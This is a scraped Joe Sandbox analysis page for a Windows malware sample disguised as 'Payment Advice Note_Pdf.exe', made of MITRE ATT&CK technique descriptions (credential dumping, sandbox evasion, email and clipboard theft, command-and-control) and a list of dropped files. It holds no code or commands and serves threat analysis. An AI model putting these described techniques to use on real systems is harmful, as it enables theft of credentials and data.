Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Advice Note_Pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\68560319414786744274685.tmp

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-debug-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-errorhandling-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-2-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l2-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-handle-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-heap-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-interlocked-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-libraryloader-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-localization-l1-2-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-memory-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-namedpipe-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processenvironment-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-0.dll

Windows Analysis Report
Payment Advice Note_Pdf.exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre